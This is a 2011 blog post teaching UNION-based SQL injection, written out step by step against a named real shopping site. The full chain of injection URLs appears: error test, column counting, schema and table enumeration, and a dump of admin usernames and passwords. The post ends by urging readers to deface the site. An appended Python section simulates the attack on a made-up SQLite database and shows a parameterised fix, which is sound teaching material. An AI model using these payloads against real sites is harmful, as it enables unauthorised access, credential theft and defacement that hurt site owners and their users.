SQL detailed with vulnerable site address to test...

Posted by Devil's World On Sunday, 6 November 2011 0 comments
A complete SQL injection walkthrough, with the address of a vulnerable site to test on. Complete tutorial written by me.

Introduction : 

What is SQLi? (SQL injection)
SQL injection is one of the basics of web hacking, and it is usually the first technique people learn for exploiting sites. It works when a page pastes user input (here a URL parameter) straight into a database query without quoting, escaping or parameterising it.

How to find SQLi-vulnerable sites and inject them:
This is very simple. Use these dorks with an SQLi scanner, or search for them on Google and check every site yourself with the single-quote test below.

Download dorks list from here : http://hotfile.com/dl/134401276/49fa4f5/dork.txt.html

now lets start...

http://www.quiltchalet.com/prod_detail.php?ID=117

This is the vulnerable link.
To test for SQL injection, add a ' either in front of or after the number/string that follows .php?ID=, e.g. http://www.quiltchalet.com/prod_detail.php?ID=117' or http://www.quiltchalet.com/prod_detail.php?ID='117. The extra quote breaks the syntax of the query the page builds, so an unescaped parameter produces a database error.

Here we get an error such as "Cannot execute SQL...". The exact message varies with the application and the database server; a site that hides errors may instead show a blank or different page, which is still a sign the quote reached the query.

Now we have to find the number of columns the page's query selects, using ORDER BY. (ORDER BY n sorts by the n-th column of the SELECT, so it counts columns, not tables; the count is what the UNION in the next step must match.)

http://www.quiltchalet.com/prod_detail.php?ID=117 order by 13--

Here I chose 13 because 13 was the last number that returned an error-free page; 14 returns an error. So you step through the numbers one at a time until the page breaks. Note that in MySQL the -- comment only works when followed by a space, so in a URL it is usually written as --+ or --%20 (or use # instead).



Now we have to find which of those 13 column positions are actually displayed on the page (the "vulnerable" columns we can read data through). For that we use the following command:

http://www.quiltchalet.com/prod_detail.php?ID=-117 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13--

The ID is made negative (-117) so the page's own query returns no row and the row supplied by our UNION is displayed instead. Some of the numbers we injected now appear on the page; here we see 6 and 7, meaning columns 6 and 7 of the query are printed.
Since 6 is shown in bold, a prominent position on the page, we will use it.


Now we have to find the version of the database. Put @@version in the displayed column:
http://www.quiltchalet.com/prod_detail.php?ID=-117 union all select 1,2,3,4,5,@@version,7,8,9,10,11,12,13--

Here we get the database version 5.0.67-community. Any MySQL from 5.0 up has the information_schema database, which the next steps rely on.

Now we have to find the database name. group_concat() joins all the schema names into one string so they fit in a single displayed column (database() alone returns just the current one):

http://www.quiltchalet.com/prod_detail.php?ID=-117 union all select 1,2,3,4,5,group_concat(schema_name),7,8,9,10,11,12,13 from information_schema.schemata--

quilt_chalet is the database name.

Now to find the table names in the current database:

http://www.quiltchalet.com/prod_detail.php?ID=-117 union all select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()--


Now we get a list of table names; the one we are interested in is the table named admin.

Now to find column names we have:

http://www.quiltchalet.com/prod_detail.php?ID=-117 union all select 1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13 from information_schema.columns where table_schema=database()--

You will now see the column names of every table in the database. To get only the columns inside the admin table:

http://www.quiltchalet.com/prod_detail.php?ID=-117 union all select 1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13 from information_schema.columns where table_name=0x61646d696e--

Note that 61646d696e is the hex encoding of the string 'admin', and we add 0x in front of it so the server treats it as a hex literal. This lets us compare against a string without sending any quote characters, which matters when the application escapes or filters quotes.

String-to-hex conversion can be done on sites like http://www.swingnote.com, or with MySQL itself (SELECT HEX('admin')).




Now we pull out what we want from the admin table (the userid and userpsswd columns found above), referencing the table as database.table:

http://www.quiltchalet.com/prod_detail.php?ID=-117 union all select 1,2,3,4,5,group_concat(userid,0x3a,userpsswd),7,8,9,10,11,12,13 from quilt_chalet.admin--

Now we get every userid and userpsswd, one pair per entry, in the format userid:userpsswd.

Here 0x3a is the hex value of the ASCII : character, used as the separator.
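The whole procedure above (quote test, ORDER BY column count, UNION marker probe, catalogue enumeration, admin dump, and the parameterised fix) as an added, runnable example that is not part of the original post. It runs against a constructed in-memory SQLite database standing in for the site, so the catalogue is sqlite_master instead of information_schema and sqlite_version() stands in for @@version; table, column and row contents are made up.

```python
"""Simulation of the UNION-based SQLi walk-through against a constructed SQLite DB."""
import re
import sqlite3


def build_db():
    # Constructed schema: a 13-column product table (so ORDER BY probing stops at 13,
    # as in the post) and an admin table with userid/userpsswd. All data is made up.
    conn = sqlite3.connect(":memory:")
    cols = ", ".join(["ID INTEGER"] + [f"c{i} TEXT" for i in range(2, 14)])
    conn.execute(f"CREATE TABLE products ({cols})")
    conn.execute("INSERT INTO products VALUES (?" + ",?" * 12 + ")",
                 [117] + [f"real{i}" for i in range(2, 14)])
    conn.execute("CREATE TABLE admin (userid TEXT, userpsswd TEXT)")
    conn.executemany("INSERT INTO admin VALUES (?,?)",
                     [("admin", "s3cret"), ("editor", "pa55")])
    return conn


def vulnerable_lookup(conn, id_param):
    """Mirrors the prod_detail.php pattern the post exploits: the ID parameter
    is pasted straight into the SQL string. Returns (ok, rows_or_error_text)."""
    sql = f"SELECT * FROM products WHERE ID={id_param}"
    try:
        return True, conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return False, str(exc)


def render_page(rows):
    """The 'page' prints only columns 6 and 7 of the first row, so only those
    positions echo a UNION marker, as 6 and 7 do in the post (6 is the bold one)."""
    if not rows:
        return "<p>No product found</p>"
    return f"<h1>{rows[0][5]}</h1><p>{rows[0][6]}</p>"


def find_column_count(conn, limit=50):
    """ORDER BY n probing: the last n that does not error is the column count."""
    for n in range(1, limit + 1):
        ok, _ = vulnerable_lookup(conn, f"117 order by {n}--")
        if not ok:
            return n - 1
    return None


def find_reflected_positions(conn, ncols):
    """UNION a row of distinctive markers and see which ones the page echoes.
    Markers beat plain 1..13 because a real page may contain those digits anyway."""
    markers = ",".join(f"'MARK{i}END'" for i in range(1, ncols + 1))
    ok, rows = vulnerable_lookup(conn, f"-117 union all select {markers}--")
    page = render_page(rows) if ok else ""
    return [i for i in range(1, ncols + 1) if f"MARK{i}END" in page]


def inject_into_slot(conn, ncols, slot, expr, from_clause=""):
    """Put expr into a displayed column (6 -> <h1>, 7 -> <p>) and read it back."""
    parts = [str(i) for i in range(1, ncols + 1)]
    parts[slot - 1] = expr
    payload = f"-117 union all select {','.join(parts)} {from_clause}--"
    ok, rows = vulnerable_lookup(conn, payload)
    if not ok:
        return None
    pattern = r"<h1>(.*?)</h1>" if slot == 6 else r"<p>(.*?)</p>"
    m = re.search(pattern, render_page(rows))
    return m.group(1) if m else None


def db_version(conn, ncols=13, slot=6):
    return inject_into_slot(conn, ncols, slot, "sqlite_version()")  # @@version in MySQL


def list_tables(conn, ncols=13, slot=6):
    # SQLite catalogue; MySQL: information_schema.tables where table_schema=database()
    return inject_into_slot(conn, ncols, slot, "group_concat(name)",
                            "from sqlite_master where type='table'")


def dump_admin(conn, ncols=13, slot=6):
    # MySQL: group_concat(userid,0x3a,userpsswd); SQLite spells the ':' join with ||
    return inject_into_slot(conn, ncols, slot,
                            "group_concat(userid||':'||userpsswd)", "from admin")


def safe_lookup(conn, id_param):
    """The fix: validate the type and bind the value; every payload above fails here."""
    try:
        product_id = int(id_param)
    except ValueError:
        return None
    return conn.execute("SELECT * FROM products WHERE ID=?", (product_id,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    n = find_column_count(db)
    print("columns:", n, "reflected:", find_reflected_positions(db, n))
    print("version:", db_version(db, n), "tables:", list_tables(db, n))
    print("admin dump:", dump_admin(db, n))
    print("hardened:", safe_lookup(db, "117 order by 14--"))
```

The marker probe and inject_into_slot generalise the post's hand-typed steps into a loop: count columns, find which are echoed, then drive any expression through the echoed slot. The hardened lookup shows why the whole chain dies with one change: once ID is cast to an integer and bound as a parameter, "117 order by 14--" and the UNION payloads are rejected as input rather than parsed as SQL.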

That's it, basic SQLi is done.

now find the admin page of that website and deface it...;)
